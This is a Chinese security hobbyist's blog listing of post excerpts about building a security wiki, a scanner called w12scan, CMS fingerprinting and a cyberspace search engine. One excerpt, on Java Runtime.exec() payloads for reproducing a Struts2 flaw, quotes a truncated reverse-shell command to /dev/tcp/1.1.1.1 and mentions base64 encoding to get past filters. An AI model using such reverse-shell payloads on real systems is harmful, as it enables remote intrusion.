各类折腾

折腾各种新奇的想法,并记录笔记

各类折腾

自建“信息安全”wiki类自学网站 - 像黑客一样学习

阅读(218)评论(9)

这是今年计划的一部分,下一步计划根据知道创宇技能表的内容来作为网站目录的大纲。 这个网站主要是给自己无聊的时候看看,优先上线自己不会的内容。 周末两天完成了第一个初始版本,支持导入markdown格式书籍,没有用到数据库,都是根据json来的,新的书籍上线只需要修改一下json格式即可上线,简单方便~ 前端简单的用bootstrap修饰了一下,勉强能看...

各类折腾

⚡️w12scan的前端设计原型图&Django 记录

阅读(503)评论(0)

为w12scan的前端设计了四张草稿,然后用Django简单的跑了下,gif录制程序可能有点失真,在本机上效果不错的。里面的数据都是临时填充的垃圾数据,不是真实数据。接下来就是功能性的设计和数据库的设计了。 Django installation recordInstallneed python >= 3pip install django mysq...

各类折腾

w12scan 想法和front-end

阅读(554)评论(0)

很久之前就有w12scan的想法,但是一直停留在那里,这次借毕业设计的机会,将它实现出来!~ Thinking原本设计出来是为了寻找SRC的资产等信息,后来觉得可以在扩大一下,保留SRC资产的收集功能,将范围扩大到全网。具体我想模仿zoomeye,fofa的全网检索功能,所以会将所有的域名IP信息进行深度的指纹识别入库,保留SRC的功能是指我可以随时指定扫...

各类折腾

Java Runtime.getRuntime().exec() 的那些payloads

阅读(2032)评论(0)

0x01在复现struts2遇到的问题,用命令执行反弹shell的时候总是失败,经过很久的测试,怀疑是"、<>等字符出现了问题。 0x02经过漫长的探索,和公开发布的poc中的payload,找到了绕过的方法,可以用类似base64编码的方式来绕过。比如bash -c 'sh -i >& /dev/tcp/1.1.1.1/666 ...

各类折腾

博客升级计划

阅读(2291)评论(2)

改装博客因为一些数据的历史性,加上也不想在折腾其他博客了,本来想自己写个博客的,但那时因为之前自己域名在国外,速度很慢,想做成静态化减小资源压力。但现在博客以及在国内备案,用腾讯云学生主机还是绰绰有余,所以没有自己造轮子的必要了,主要是解决一下emlog长久不更新内心存在的”不安全感”。 原系统中好多功能可以更加优美,加上漏洞部分,所以我决定对博客系统...

各类折腾

CMS在线识别(三)数据统计

阅读(940)评论(0)

在全网扫描时,对CMS指纹进行分析,想法是仅从首页或者一些地方就可以获取到,尽量不使用指纹库中庞大的路径扫描。 同时也统计排名Top使用的cms,数据为airbug项目提供参考。 查询语句: SELECT result,count(id) as total FROM `whatcms_result` group by re...

各类折腾

基于深度学习的CMS识别,在线体验地址

阅读(1159)评论(0)

只训练了dedecms和discuz这两个分类,地址是 http://ai.baidu.com/easydl/h5/15056/ef04c0d2f32f9cddf840b0f4b8f31c7c 测试了一下,准确率差强人意,但效果还是有的 next图像识别准确率还是差强人意,而且还让我认识到一个问题,比如emlog和WordPress两个都是博客系统,...

各类折腾

AirEye 网络空间搜索引擎

阅读(1078)评论(0)

看了Biu的演示视频,太棒了,我也要和它做得一样甚至更好 花了一下午的时间用Bootrasp4画出了界面,觉得还不错,后面再用一些小图标修饰一下就更好了